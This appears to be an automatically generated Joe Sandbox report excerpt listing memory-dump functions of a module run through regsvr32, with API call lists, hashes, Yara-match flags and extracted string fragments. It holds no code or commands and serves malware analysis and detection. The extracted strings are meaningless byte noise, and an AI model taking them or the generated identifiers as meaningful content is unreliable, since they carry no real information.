• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
• Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
• String ID:
• API String ID: 3778485334-0
• Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
• Instruction ID: fa7479ab49416c6b742ba723fac1dd27d007e73a1d69db945fc0a40fbd939531
• Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
• Instruction Fuzzy Hash: AF31B135908F4295EB50DF55F8AA3A973A0FB84788F5000B6DAAD82765EF7CE08CC701
Uniqueness
Uniqueness Score: -1.00%

APIs
• _lock.LIBCMT ref: 00007FF8CA9BE6EB
• free.LIBCMT ref: 00007FF8CA9BE7E2
  • Part of subcall function 00007FF8CA9B3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B303A
  • Part of subcall function 00007FF8CA9B3024: _errno.LIBCMT ref: 00007FF8CA9B3044
  • Part of subcall function 00007FF8CA9B3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B304C
• ___lc_codepage_func.LIBCMT ref: 00007FF8CA9BE76B
  • Part of subcall function 00007FF8CA9B6550: RtlCaptureContext.KERNEL32 ref: 00007FF8CA9B658F
  • Part of subcall function 00007FF8CA9B6550: IsDebuggerPresent.KERNEL32 ref: 00007FF8CA9B662D
  • Part of subcall function 00007FF8CA9B6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6637
  • Part of subcall function 00007FF8CA9B6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6642
  • Part of subcall function 00007FF8CA9B6550: GetCurrentProcess.KERNEL32 ref: 00007FF8CA9B6658
  • Part of subcall function 00007FF8CA9B6550: TerminateProcess.KERNEL32 ref: 00007FF8CA9B6666
Memory Dump Source
• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
• Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
Similarity
• API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
• String ID:
• API String ID: 178205154-0
• Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
• Instruction ID: 2e71a6978c7c1703c574a5cea591d2418778aace61b053151074dd52d01e8042
• Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
• Instruction Fuzzy Hash: C4D1C532A0878289E7309F25B4AA77936A9BF857C0F404175DAADD7795CF3CE8598700
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BDFF2
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BE004
• GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BE04F
• GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BE0E1
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BE11B
• free.LIBCMT ref: 00007FF8CA9BE12F
  • Part of subcall function 00007FF8CA9B6C34: _FF_MSGBANNER.LIBCMT ref: 00007FF8CA9B6C64
  • Part of subcall function 00007FF8CA9B6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF8CA9B30C0,?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3), ref: 00007FF8CA9B6C89
  • Part of subcall function 00007FF8CA9B6C34: _errno.LIBCMT ref: 00007FF8CA9B6CAD
  • Part of subcall function 00007FF8CA9B6C34: _errno.LIBCMT ref: 00007FF8CA9B6CB8
• GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BE145
Memory Dump Source
• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
• Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
Similarity
• API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
• String ID:
• API String ID: 2309262205-0
• Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
• Instruction ID: dfc63478149f750bdacd88dde3e70283c1c5f3a7f7490d3d0aed734df49038dc
• Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
• Instruction Fuzzy Hash: 3C519632A0874296E7709F11B86A27973A5FB447E8F544575DA3E83BD4DF7CE8488300
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
• Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
Similarity
• API ID: _errno$DecodePointer_lock
• String ID:
• API String ID: 2175075375-0
• Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
• Instruction ID: 4624b28f60439714c100013eda3efe5623b8d99d434d7b22c7dd7ffa13253b30
• Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
• Instruction Fuzzy Hash: 12318122B0875242FB35AE61B46B7BA6291AF847C4F048574DF5D8BB86DF3CE4198700
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
• Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
• String ID:
• API String ID: 1269745586-0
• Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
• Instruction ID: 50636111c6ddb9e6d9aa2f61d5725264bf9171ddeed043406e211fdd10d4c586
• Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
• Instruction Fuzzy Hash: E3311E72608B8692DB24DF54F4593AAB3A0FB88788F500176DB9D83A59EF7CD149CB00
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: "+H$1l7.$M8;$]$d$]k$]k$94
• API String ID: 0-2447245168
• Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
• Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
• Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
• Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
• Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
• Instruction ID: beff37bc8d48c0490f1ff2d17a44a2b995b2b12f29dd59ce9c807abbf072178b
• Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
• Instruction Fuzzy Hash: 32215021B08B4791FB30DF20F86A2B963A0EF487C8F444170DA5DD76A5EE2CE909C780
Uniqueness
Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 1h$I-$IY$QL&$li7$o
                                                                    • API String ID: 0-890095520
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 1$ {,$"$$-%$Rku$ i
                                                                    • API String ID: 0-1845893065
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUS/$YV~$p$@$EX$OX
                                                                    • API String ID: 0-2743166816
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                    • API String ID: 0-2100131636
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                    • API String ID: 0-2401169580
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )#?$EX.$PT$UbA$2f
                                                                    • API String ID: 0-1318892062
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $T$?F$QP|m$qjf$tZp
                                                                    • API String ID: 0-3477398917
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JQ$k&($t$v$x\J
                                                                    • API String ID: 0-1134872184
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: R$)H8$?rIc$L==$V
                                                                    • API String ID: 0-2512384441
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Qq$bt$vird$+$S
                                                                    • API String ID: 0-3373980505
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale$_getptd
                                                                    • String ID:
                                                                    • API String ID: 1743167714-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: V$@$P9$^_"
                                                                    • API String ID: 0-1880944046
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$'Xsa$iJ6$vG
                                                                    • API String ID: 0-746338152
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *i^$MIC$-Z$]2
                                                                    • API String ID: 0-498664264
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >97"$?$LsRW$~x
                                                                    • API String ID: 0-2554301858
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B$EG$QsF$_
                                                                    • API String ID: 0-784369960
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -`G$.$5B.Y$Z`35
                                                                    • API String ID: 0-1363032466
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *+_$WSh$\O$#o
                                                                    • API String ID: 0-1846314129
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .B$O$M*K$\<
                                                                    • API String ID: 0-3225238681
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$xVO$~O
                                                                    • API String ID: 0-3655128719
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,IW$G$JMg$l
                                                                    • API String ID: 0-1370644289
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$__tzset
                                                                    • String ID:
                                                                    • API String ID: 3587134695-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$DecodePointer_lock
                                                                    • String ID:
                                                                    • API String ID: 2175075375-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlCaptureContext.KERNEL32 ref: 00007FF8CA9BD357
                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9BD39D
                                                                    • UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9BD3A8
                                                                      • Part of subcall function 00007FF8CA9B6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF8CA9B7194,?,?,?,?,00007FF8CA9B6C69,?,?,00000000,00007FF8CA9B30C0), ref: 00007FF8CA9B6FCF
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                    • String ID:
                                                                    • API String ID: 2731829486-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *4$5F$S^r
                                                                    • API String ID: 0-3556444313
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: &lz2$'~W$<x<
                                                                    • API String ID: 0-2268522332
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: o6.$s8Q${Fl&
                                                                    • API String ID: 0-2665016659
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$T]0$ba^2
                                                                    • API String ID: 0-1276948933
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
